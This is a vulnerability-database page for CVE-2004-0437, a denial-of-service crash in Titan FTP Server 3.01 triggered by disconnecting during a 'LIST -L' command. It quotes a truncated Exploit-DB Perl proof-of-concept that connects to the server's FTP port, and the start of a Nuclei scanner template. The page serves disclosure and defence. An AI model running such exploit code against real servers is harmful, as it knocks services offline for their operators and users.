CVE-2004-0437
published 2004-07-07CVE-2004-0437: Titan FTP Server version 3.01 build 163, and possibly other versions before build 169, allows remote authenticated users to cause a denial of service (crash)…
PriorityP420medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
7.67%
93.8th percentile
Titan FTP Server version 3.01 build 163, and possibly other versions before build 169, allows remote authenticated users to cause a denial of service (crash) by disconnecting from the system during a "LIST -L" command, which causes Titan to access an invalid socket.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| south_river_technologies | titan_ftp_server | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Titan FTP Server 3.0 - 'LIST' Denial of Service
exploitdb·2004-05-04
CVE-2004-0437 Titan FTP Server 3.0 - 'LIST' Denial of Service
Titan FTP Server 3.0 - 'LIST' Denial of Service
---
source: https://www.securityfocus.com/bid/10272/info
Titan FTP is prone to a remote denial of service vulnerability when handling the 'LIST' command.
A remote attacker can cause the FTP server to crash by improperly handling a non-existent socket.
#!/usr/bin/perl
# Test for Titan FTP server security vulnerability
use IO::Socket;
$host = "192.168.1.243";
my @combination;
$combination[0] = "LIST \r\n";
for (my $i = 0; $combination[$i] ; $i++)
{
print "Combination: $1\n";
$remote = IO::Socket::INET->new ( Proto => "tcp",
PeerAddr => $host,
PeerPort => "2112",
);
unless ($remote) { die "cannot connect to ftp daemon on $host" }
print "connected\n";
while ()
{
print $_;
if (/220 /)
{
last;
}
}
$remote->autoflush(1);
my $ftp = "USER
Nuclei
Titan FTP Server 3.01 - DoS via LIST Command Disconnection
nuclei·CVSS 5.0
CVE-2004-0437 [MEDIUM] Titan FTP Server 3.01 - DoS via LIST Command Disconnection
Titan FTP Server 3.01 - DoS via LIST Command Disconnection
Titan FTP Server version 3.01 build 163 (and possibly other older versions) contains a vulnerability where disconnecting during a LIST -L command may crash the daemon. Remote attackers can cause denial of service by initiating a LIST -L command and then abruptly disconnecting, leading to server instability.
Template:
id: CVE-2004-0437
info:
name: Titan FTP Server 3.01 - DoS via LIST Command Disconnection
author: pussycat0x
severity: medium
description: |
Titan FTP Server version 3.01 build 163 (and possibly other older versions) contains a vulnerability where disconnecting during a LIST -L command may crash the daemon. Remote attackers can cause denial of service by initiating a LIST -L command and then abruptly disconnecting,
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/vulnwatch/2004-q2/0025.htmlhttp://marc.info/?l=bugtraq&m=108378048513596&w=2http://www.securiteam.com/windowsntfocus/5RP0215CUU.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/16057http://archives.neohapsis.com/archives/vulnwatch/2004-q2/0025.htmlhttp://marc.info/?l=bugtraq&m=108378048513596&w=2http://www.securiteam.com/windowsntfocus/5RP0215CUU.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/16057
2004-07-07
Published